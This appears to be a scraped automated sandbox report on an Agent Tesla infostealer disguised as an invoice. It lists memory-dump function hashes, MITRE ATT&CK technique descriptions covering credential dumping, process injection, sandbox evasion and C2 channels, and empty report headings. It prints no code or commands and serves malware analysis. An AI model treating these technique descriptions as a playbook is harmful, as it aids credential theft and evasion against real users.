Instruction ID: ef07795deaf484bcc8a3e63ae09a755bdd3f1a8bb688c171a3a66a523364478b
Opcode Fuzzy Hash: 994cd469b081d4dbdea4594a9b077936c8f0a6e67c769da6a49c5fef804815f1
Instruction Fuzzy Hash: 1F519134B412049FDB08EB78D9945AEBBB7EB88304F15852AE51AD7384DF34DC52CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05F492F8, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 909323b3c2361687aabe99cb04bf05fdd20902c8f7d54ecebc078fb1b2c1fa7a
Instruction ID: a15e346a7169807bb7246c24ea90c344e0dcf072933b8c978340e8d6e2832870
Opcode Fuzzy Hash: 909323b3c2361687aabe99cb04bf05fdd20902c8f7d54ecebc078fb1b2c1fa7a
Instruction Fuzzy Hash: E1310731F141498BDB44DA7CDA502AF7BEA9BC9704F01443B960ADB381EEB89D058791

Uniqueness

Uniqueness Score: -1.00%

Function 00EC05D1, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.470923096.0000000000EC0000.00000040.00000040.sdmp, Offset: 00EC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4705fa7ba500b190d7c442101afb60ec9726b8592aa4a5a0d40f6465e92c49b
Instruction ID: 2c7a1ba8c6efe972bd654e42dafbe05832b837ac5ef5c020dee480088cc20a3f
Opcode Fuzzy Hash: b4705fa7ba500b190d7c442101afb60ec9726b8592aa4a5a0d40f6465e92c49b
Instruction Fuzzy Hash: 4001C87250D7C09FDB128B16AC40966BFF8DB5762071980DFD9488B652D2256909CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00EC0BFC, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.470923096.0000000000EC0000.00000040.00000040.sdmp, Offset: 00EC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d70a7c223be979291e2072f7936387abafa2dbdb4026bfb44bc706bb88f96e99
Instruction ID: e9f5dc51fa51c484e087fbc2b4d619778e64f1ebf74915d63458dd262d9663f0
Opcode Fuzzy Hash: d70a7c223be979291e2072f7936387abafa2dbdb4026bfb44bc706bb88f96e99
Instruction Fuzzy Hash: 22214F7150D3C08FC7038B20C950F55BFB1AB57318F1996EED8859B6A3D67A8807DB52

Uniqueness

Uniqueness Score: -1.00%

Function 05892D06, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.475909037.0000000005890000.00000040.00000001.sdmp, Offset: 05890000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41ccd47b081623d737249a5b2eff53139c3ec35cc2a9a1709713a91737b1c93b
Instruction ID: 66ad66481bec6c9577fbe394fbcae33b8035e62e8d98db5402012bc5ad59ce49
Opcode Fuzzy Hash: 41ccd47b081623d737249a5b2eff53139c3ec35cc2a9a1709713a91737b1c93b
Instruction Fuzzy Hash: 1721B7B5608341AFD340CF19D840A5BFBE4EB89664F14896EF98897311D375E9088F62

Uniqueness

Uniqueness Score: -1.00%

Function 05F4A9E8, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95a4e01547d2a35f570a0d56eb6f45dff1ab33120742f43f7591454459c643c8
Instruction ID: 3a00424cdab9e1f1efc964a1ece4e93f0ec2b0cb96c864287b05027411a85d70
Opcode Fuzzy Hash: 95a4e01547d2a35f570a0d56eb6f45dff1ab33120742f43f7591454459c643c8
Instruction Fuzzy Hash: D1114F75F001448F9B48EB7DD8549AEBBF6DB8D610F504029D10AE7380EE35AC528B65

Uniqueness

Uniqueness Score: -1.00%

Function 05F491D8, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2106566bf6d05fee168111cd5fde6c11a1d4a5a5d98b9bf4600202bbdd92fc5f
Instruction ID: 4bd17221d8593e2dc2213bd0ce3d02fff6bc86b60bc3a83e8089311dd90938f2
Opcode Fuzzy Hash: 2106566bf6d05fee168111cd5fde6c11a1d4a5a5d98b9bf4600202bbdd92fc5f
Instruction Fuzzy Hash: F6118C71B001448F8B48EBBDD8645AEBBF6DB8C210F504029D10AE7380EE34AC02CB64

Uniqueness

Uniqueness Score: -1.00%

Function 05F4A068, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b5af3cfaf9ea69ef40820f6b1810a8cba70ff705587ef9a90dc78b712b6925
Instruction ID: 7d240fc0f1a7d8b110ba9ae663f0d8677a4e2c6bb70befcb9f3590c598e60727
Opcode Fuzzy Hash: 21b5af3cfaf9ea69ef40820f6b1810a8cba70ff705587ef9a90dc78b712b6925
Instruction Fuzzy Hash: 32118275B001448F9B48EB7DD8545AE7BF6DB8D250F544029D109F7340EE34AC02CB64

Uniqueness

Uniqueness Score: -1.00%

Function 05F4AB08, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19c9c3dbb7eb7655494adab540df97c71f46da1e304dadde17e08df76ea2ca60
Instruction ID: 3ad84c73ce30bd4b601749c203cd3fee746c07fe35013f0fb9d64122430e6866
Opcode Fuzzy Hash: 19c9c3dbb7eb7655494adab540df97c71f46da1e304dadde17e08df76ea2ca60
Instruction Fuzzy Hash: 20115E71B001488F9B48EBBDD854AAEBBF6DB8D614F504039D10AF7340EE34AD528BA4

Uniqueness

Uniqueness Score: -1.00%

Function 05893778, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.475909037.0000000005890000.00000040.00000001.sdmp, Offset: 05890000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4827469ff9650448278151e3e430d5f5b5d62f31362658b82d57131f586fc06
Instruction ID: 1042760d631c8e6d5eb361247fadb712104b2a04ebcf475016acd69dbf99a39d
Opcode Fuzzy Hash: f4827469ff9650448278151e3e430d5f5b5d62f31362658b82d57131f586fc06
Instruction Fuzzy Hash: E911BDB5508301AFD340CF19D840A5BFBE4FB88664F14895EF998D7311D371EA148FA6

Uniqueness

Uniqueness Score: -1.00%

Function 00EC0C34, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.470923096.0000000000EC0000.00000040.00000040.sdmp, Offset: 00EC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2449c06c0f678625e73eef056f041fbb0a1480ec4048f8c3d8efd45f9c16d86
Instruction ID: dc582af6d17e325458fe3570eb0c961b7e0ff3d4ac5ab7d1c46a470962784954
Opcode Fuzzy Hash: f2449c06c0f678625e73eef056f041fbb0a1480ec4048f8c3d8efd45f9c16d86
Instruction Fuzzy Hash: BA11B430204344DFD715CB14C640F26FBA5AB88718F34D69DE9492B643C77BD803DA51

Uniqueness

Uniqueness Score: -1.00%

Function 0589361C, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.475909037.0000000005890000.00000040.00000001.sdmp, Offset: 05890000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eb1d629f96eaf18ceb0445de55a218a7e7a40dc17b6a99f7335792f9e55af64
Instruction ID: b057b3f46fd1992b4120c2afabd36c7b5938076733cf74cfd3c06ffb156133c8
Opcode Fuzzy Hash: 1eb1d629f96eaf18ceb0445de55a218a7e7a40dc17b6a99f7335792f9e55af64
Instruction Fuzzy Hash: 9911DAB5608301AFD350CF09D880A5BFBE8EB88660F14891EFD9897311D371E9088BA2

Uniqueness

Uniqueness Score: -1.00%

Function 05F45E82, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d16e7fdac50b3881a0dffcd2fb7ba45d833ad92f5b9b8c09466d28022128926f
Instruction ID: 57a7c01b8fb79b2f3867393b3349dd629050713dc998ae89d1fbf543f22076dd
Opcode Fuzzy Hash: d16e7fdac50b3881a0dffcd2fb7ba45d833ad92f5b9b8c09466d28022128926f
Instruction Fuzzy Hash: 8EF0E974A000499FE700CBACC848DBAF7B9FBC4324B14C296E448E3515C635DC56CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05F45903, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60c897064d2e5f97a3dbf79aee18af9a12175cc9c34df6cb5783f7b156533647
Instruction ID: 9f235399da5177e90ad8857b181ad9b64b2edd2543ccbe6f600705cb3efa96ec
Opcode Fuzzy Hash: 60c897064d2e5f97a3dbf79aee18af9a12175cc9c34df6cb5783f7b156533647
Instruction Fuzzy Hash: B6F08270B403149FEB18ABB48C9076D7EB3AF84714F294565E606AF2D1EE399C52C740

Uniqueness

Uniqueness Score: -1.00%

Function 00EC0CF0, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.470923096.0000000000EC0000.00000040.00000040.sdmp, Offset: 00EC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 525cef522958239b2deb72ab7ac90410e2832b06fb356f1b7ca8807ee3c9392c
Instruction ID: a3f5c60d461e5fe81ac296fc7c9e23d25b2fca4011dcdbd33c341b6a5957da20
Opcode Fuzzy Hash: 525cef522958239b2deb72ab7ac90410e2832b06fb356f1b7ca8807ee3c9392c
Instruction Fuzzy Hash: 0CF0B635248644DFC716CF40DA40F25FBA2FB89718F24CAADE9491B762C737A813DA81

Uniqueness

Uniqueness Score: -1.00%

Function 00EC05F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.470923096.0000000000EC0000.00000040.00000040.sdmp, Offset: 00EC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb75c663fdfe04ad10a5cb92a02577687e5cdfb9edde8016a394e24107cc3bb2
Instruction ID: 62ea4a03ba50bcd9863ca348d38d115cc1981d3a2100f8f3bb211cb4ef0d015e
Opcode Fuzzy Hash: eb75c663fdfe04ad10a5cb92a02577687e5cdfb9edde8016a394e24107cc3bb2
Instruction Fuzzy Hash: 98E092B66006008BD650CF0BFC41452F7D8EB88630B18C07FDD0D8B700E235B508CEA6

Uniqueness

Uniqueness Score: -1.00%

Function 058937E3, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.475909037.0000000005890000.00000040.00000001.sdmp, Offset: 05890000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38c30cf34e011acbad50b3ebd05fd23cdf07eb55d0379ab90f622063ffe3cf21
Instruction ID: ac4b5c1a971e1c29daf4ed3ce071c27806eaafc6648e6c76ceac469e92850358
Opcode Fuzzy Hash: 38c30cf34e011acbad50b3ebd05fd23cdf07eb55d0379ab90f622063ffe3cf21
Instruction Fuzzy Hash: 00E0D8B254030067D2508F06AC45B53FB98DB84A30F14C567EE081B301E271B5188AE5

Uniqueness

Uniqueness Score: -1.00%

Function 0589366B, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.475909037.0000000005890000.00000040.00000001.sdmp, Offset: 05890000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 625158e0c07d5c253938f305b73e38dad60ca0438e52dd47190c397e0a06b0b9
Instruction ID: 96918eb0ffe9c7320f116ee8feddaea255615e71c0e19e443b3865ddf13fa1a6
Opcode Fuzzy Hash: 625158e0c07d5c253938f305b73e38dad60ca0438e52dd47190c397e0a06b0b9
Instruction Fuzzy Hash: 01E0D8B250030467D2509F06AC85B53FB98DB44A30F14C557EE0C1B302E272B5148AF5

Uniqueness

Uniqueness Score: -1.00%

Function 05892D7B, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.475909037.0000000005890000.00000040.00000001.sdmp, Offset: 05890000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f86dd3027b9025179d2345a7cb797c3994e441ca288d185cf13686c8c795f7d
Instruction ID: 9ed7e6caf81da2ad4b2f777de74d71dc4acf19dc0a636fea1852d226d108cdc4
Opcode Fuzzy Hash: 7f86dd3027b9025179d2345a7cb797c3994e441ca288d185cf13686c8c795f7d
Instruction Fuzzy Hash: B0E0D8B250030067D2108F06AC45B53FB98DB80A30F14C557EE081F302E271B5188AE5

Uniqueness

Uniqueness Score: -1.00%

Function 05F45E66, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 576e37fb67ccd91db28fb8d946d8feb1b456fbb66b49a5ac4d1b43ac8ababfcd
Instruction ID: ee4303f53ab21087a5128d4af45404c266763e7038329e8248a11b7efb4ea4e7
Opcode Fuzzy Hash: 576e37fb67ccd91db28fb8d946d8feb1b456fbb66b49a5ac4d1b43ac8ababfcd
Instruction Fuzzy Hash: 55D05EB6E092864A8B529AB898800DCFF24AE8213635813EAD1B48B5E9E22021128B05

Uniqueness

Uniqueness Score: -1.00%

Function 05F443EF, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cea8a0390d1b5040e4b574626f591a9fd0c6e22e55ab8bb96b902de20ef5884c
Instruction ID: 78146d0bb5cd3cf879adadf27af01bc3b0e2abf5db3d44efab5040a2d3d40d77
Opcode Fuzzy Hash: cea8a0390d1b5040e4b574626f591a9fd0c6e22e55ab8bb96b902de20ef5884c
Instruction Fuzzy Hash: 26B092A4C055449E8744CFAD80100A8BFB46E0A10070080A6E164EA221E32440018F20

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Proforma Invoice with Bank Details_pdf.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

SMTP Packets

Code Manipulations

Function 00C41970, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110
memoryCOMMON

Function 00C44681, Relevance: 18.1, APIs: 12, Instructions: 109
COMMON

Function 00C4F48B, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Function 00C4F468, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 00C4A5C8, Relevance: 1.3, APIs: 1, Instructions: 7
memoryCOMMON

Function 00C48FC4, Relevance: .3, Instructions: 345
COMMONCrypto

Function 00C493F9, Relevance: .3, Instructions: 341
COMMONCrypto

Function 00C48B8F, Relevance: .3, Instructions: 331
COMMONCrypto

Function 00C48777, Relevance: .3, Instructions: 323
COMMONCrypto

Function 00C47F60, Relevance: .1, Instructions: 76
COMMONCrypto

Function 00C4B7CA, Relevance: 16.7, APIs: 11, Instructions: 229
COMMON

Function 00C426BC, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49
COMMON

Function 00C4E0FB, Relevance: 13.6, APIs: 9, Instructions: 66
COMMON

Function 00C420F0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Function 00C410D0, Relevance: 10.6, APIs: 7, Instructions: 50
COMMON

Function 00C4AB93, Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Function 00C49C15, Relevance: 9.1, APIs: 6, Instructions: 134
COMMON

Function 00C41040, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Function 00C431D4, Relevance: 7.6, APIs: 5, Instructions: 144
COMMON

Function 00C4F5EC, Relevance: 7.6, APIs: 5, Instructions: 67
COMMON

Function 00C42D81, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142
COMMON

Function 00C52A3B, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
COMMON

Function 00C445BC, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 12
COMMON

Function 00C475E3, Relevance: 6.1, APIs: 4, Instructions: 139
COMMON

Function 00C53031, Relevance: 6.1, APIs: 4, Instructions: 96
COMMON

Function 00C46F2D, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Function 00C4F732, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Function 00C4C33C, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Function 00C41CE0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre